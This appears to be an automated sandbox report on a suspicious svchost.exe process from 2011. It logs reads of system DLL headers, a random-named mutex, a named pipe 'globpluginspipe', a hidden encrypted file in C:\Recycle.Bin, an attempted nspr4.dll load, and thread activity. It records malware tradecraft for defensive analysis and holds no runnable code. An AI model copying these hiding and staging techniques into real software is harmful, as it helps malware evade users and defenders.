File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081526292
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081526906
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081527172
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081527708
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081528051
System info queried Type: ProcessorInformation success or wait 2081529179
System info queried Type: ProcessorInformation success or wait 2081532237
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081532656
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081533591
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081533860
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081534261
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081534526
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081534841
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081535452
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081535718
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081536252
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081536594
System info queried Type: ProcessorInformation success or wait 2081537718
System info queried Type: ProcessorInformation success or wait 2081540657
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081541072
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081541927
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081542198
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081542642
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081542909
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081543226
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081543838
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081544103
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081544638
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081544980
System info queried Type: ProcessorInformation success or wait 2081546104
System info queried Type: ProcessorInformation success or wait 2081549209
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081549619
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081550486
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081550755
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081551379
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081551646
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2081551962
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081552572
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2081552886
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081553422
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2081553764
System info queried Type: ProcessorInformation success or wait 2081554885
System info queried Type: ProcessorInformation success or wait 2081557157
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081557569
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081558430
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081558700
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081559321
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081559587
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2081559903
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081560514
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2081560780
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081561315
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2081564806
System info queried Type: ProcessorInformation success or wait 2081566240
System info queried Type: ProcessorInformation success or wait 2081569209
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081569627
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081570766
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081571731
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2081572051
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2081572931
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2081573811
System info queried Type: ProcessorInformation success or wait 2081574938
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2081577109
Thread created PID: 968 TID: 424 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081578655
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2081596196
Thread delayed Time: 0 TID: 914 success or wait 2082457096
Thread delayed Time: 0 TID: 914 success or wait 2082457615
Thread delayed Time: 0 TID: 914 success or wait 2082458108
Thread delayed Time: 0 TID: 914 success or wait 2083575645
Thread delayed Time: 0 TID: 914 success or wait 2083576159
Thread delayed Time: 0 TID: 914 success or wait 2083576649
Thread delayed Time: 0 TID: 914 success or wait 2084694103
Thread delayed Time: 0 TID: 914 success or wait 2084694622
Thread delayed Time: 0 TID: 914 success or wait 2084695115
Thread delayed Time: 0 TID: 914 success or wait 2085812582
Thread delayed Time: 0 TID: 914 success or wait 2085813115
Thread delayed Time: 0 TID: 914 success or wait 2085813612
Thread delayed Time: 0 TID: 914 success or wait 2086931524
Thread delayed Time: 0 TID: 914 success or wait 2086932050
Thread delayed Time: 0 TID: 914 success or wait 2086932555
Thread delayed Time: 0 TID: 914 success or wait 2088050118
Thread delayed Time: 0 TID: 914 success or wait 2088050644
Thread delayed Time: 0 TID: 914 success or wait 2088051149
Thread delayed Time: 0 TID: 914 success or wait 2089168754
Thread delayed Time: 0 TID: 914 success or wait 2089169280
Thread delayed Time: 0 TID: 914 success or wait 2089169779
Thread delayed Time: 0 TID: 914 success or wait 2090287331
Thread delayed Time: 0 TID: 914 success or wait 2090287844
Thread delayed Time: 0 TID: 914 success or wait 2090288345
Thread delayed Time: 0 TID: 914 success or wait 2091405939
Thread delayed Time: 0 TID: 914 success or wait 2091406463
Thread delayed Time: 0 TID: 914 success or wait 2091406967
Thread delayed Time: 0 TID: 914 success or wait 2092527284
Thread delayed Time: 0 TID: 914 success or wait 2092527816
Thread delayed Time: 0 TID: 914 success or wait 2092528309
Thread delayed Time: 0 TID: 914 success or wait 2093643245
Thread delayed Time: 0 TID: 914 success or wait 2093643770
Thread delayed Time: 0 TID: 914 success or wait 2093644272
Thread delayed Time: 0 TID: 914 success or wait 2094764655
Thread delayed Time: 0 TID: 914 success or wait 2094765181
Thread delayed Time: 0 TID: 914 success or wait 2094765684
Thread delayed Time: 0 TID: 914 success or wait 2095883198
Thread delayed Time: 0 TID: 914 success or wait 2095883725
Thread delayed Time: 0 TID: 914 success or wait 2095884228
Thread delayed Time: 0 TID: 914 success or wait 2096998616
Thread delayed Time: 0 TID: 914 success or wait 2096999132
Thread delayed Time: 0 TID: 914 success or wait 2096999633
Thread delayed Time: 0 TID: 914 success or wait 2098117230
Thread delayed Time: 0 TID: 914 success or wait 2098117744
Thread delayed Time: 0 TID: 914 success or wait 2098118246
Thread delayed Time: 0 TID: 914 success or wait 2099236211
Thread delayed Time: 0 TID: 914 success or wait 2099236735
Thread created PID: 968 TID: 2648 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2189173971
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2189185240
Thread created PID: 968 TID: 3176 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2296393565
Thread created PID: 968 TID: 3216 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2297521482
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2297527947
+ Sections
+ General
Start time: 05:48:07
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\System32\svchost.exe -k netsvcs
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path | Access | Options | Content overwritten | Completion | Count | Source Address
C:\WINDOWS\system32\ntdll.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 5 | BAD6A36
C:\Recycle.Bin\07A49F015E0D693 | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 2 | BAF4E4E
C:\WINDOWS\system32\USER32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
C:\WINDOWS\system32\WININET.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 11 | BAD6A36
c:\windows\system32\WS2_32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
c:\windows\system32\CRYPT32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
\pipe\globpluginspipe | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | object name not found | 4 | BADD812
+ File read
File Path | Offset | Length | Value | Completion | Count | Source Address
C:\WINDOWS\system32\ntdll.dll | none | 4 | D0 00 00 00 | success or wait | 5 | BAD6699
C:\WINDOWS\system32\ntdll.dll | none | 20 | 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 5 | BAD66D5
C:\WINDOWS\system32\ntdll.dll | none | 224 | 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 | success or wait | 5 | BAD6717
C:\WINDOWS\system32\ntdll.dll | none | 160 | 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 | success or wait | 5 | BAD67A2
C:\Recycle.Bin\07A49F015E0D693 | none | 5934 | 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 | success or wait | 2 | BAE818F
C:\WINDOWS\system32\user32.dll | none | 4 | D8 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\user32.dll | none | 20 | 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\user32.dll | none | 224 | 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 | success or wait | 1 | BAD6717
C:\WINDOWS\system32\user32.dll | none | 160 | 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 | success or wait | 1 | BAD67A2
C:\WINDOWS\system32\wininet.dll | none | 4 | F8 00 00 00 | success or wait | 11 | BAD6699
C:\WINDOWS\system32\wininet.dll | none | 20 | 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 | success or wait | 11 | BAD66D5
C:\WINDOWS\system32\wininet.dll | none | 224 | 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 | success or wait | 11 | BAD6717
C:\WINDOWS\system32\wininet.dll | none | 160 | 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 | success or wait | 11 | BAD67A2
C:\WINDOWS\system32\ws2_32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\ws2_32.dll | none | 20 | 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\ws2_32.dll | none | 224 | 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 | success or wait | 1 | BAD6717
C:\WINDOWS\system32\ws2_32.dll | none | 160 | 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 | success or wait | 1 | BAD67A2
C:\WINDOWS\system32\advapi32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\advapi32.dll | none | 20 | 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\advapi32.dll | none | 224 | 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 | success or wait | 1 | BAD6717
C:\WINDOWS\system32\advapi32.dll | none | 160 | 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 | success or wait | 1 | BAD67A2
C:\WINDOWS\system32\crypt32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\crypt32.dll | none | 20 | 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\crypt32.dll | none | 224 | 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 | success or wait | 1 | BAD6717
C:\WINDOWS\system32\crypt32.dll | none | 160 | 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 | success or wait | 1 | BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\MSIMG32.dll write and read and execute unknown E30000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1A90000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 1A90000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1A90000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1A90000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 1A806B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2616 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 1A80639
3420 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3424 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3456 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2204 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
772 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2812 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2800 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
4048 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13344 0s success or wait 925 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2616 1052 success or wait 0 1A80279
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
